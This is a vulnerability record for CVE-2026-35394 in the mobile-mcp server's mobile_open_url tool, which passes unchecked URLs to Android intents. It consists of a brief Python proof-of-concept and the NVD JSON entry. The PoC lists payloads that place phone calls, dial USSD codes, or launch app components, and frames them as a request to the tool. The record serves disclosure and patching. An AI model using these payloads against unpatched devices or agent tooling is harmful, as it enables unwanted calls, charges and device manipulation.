CVE-2026-35394

# PoC for CVE-2026-35394 # Demonstrating how to trigger an arbitrary Intent via mobile_open_url def exploit_poc(): # The vulnerable endpoint expects a URL parameter # By using an Intent scheme, we can bypass scheme validation # Example 1: Trigger a phone call malicious_url = "tel:1234567890" # Example 2: Trigger a USSD code # malicious_url = "tel:*123#" # Example 3: Complex Intent to launch a specific component # malicious_url = "intent:#Intent;component=com.android.settings/.Settings;end" print(f"[+] Sending payload to vulnerable mobile_open_url tool: {malicious_url}") # Simulating the request payload to the MCP server payload = { "url": malicious_url } # In a real scenario, send this payload to the mobile-mcp server API # The server will execute: Intent.parseUri(malicious_url, ...) -> startActivity(intent) return payload if __name__ == "__main__": exploit_poc()

{"cve": {"id": "CVE-2026-35394", "sourceIdentifier": "[email protected]", "published": "2026-04-06T21:16:21.300", "lastModified": "2026-04-09T17:49:05.567", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mobile Next is an MCP server for mobile development and automation. Prior to 0.0.50, the mobile_open_url tool in mobile-mcp passes user-supplied URLs directly to Android's intent system without any scheme validation, allowing execution of arbitrary Android intents, including USSD codes, phone calls, SMS messages, and content provider access. This vulnerability is fixed in 0.0.50."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:H", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-939"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mobilenexthq:mobile_mcp:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "0.0.50", "matchCriteriaId": "7C25CC83-A709-4193-8CBF-063A67E51430"}]}]}], "references": [{"url": "https://github.com/mobile-next/mobile-mcp/security/advisories/GHSA-5qhv-x9j4-c3vm", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/mobile-next/mobile-mcp/security/advisories/GHSA-5qhv-x9j4-c3vm", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Patch", "Vendor Advisory"]}]}}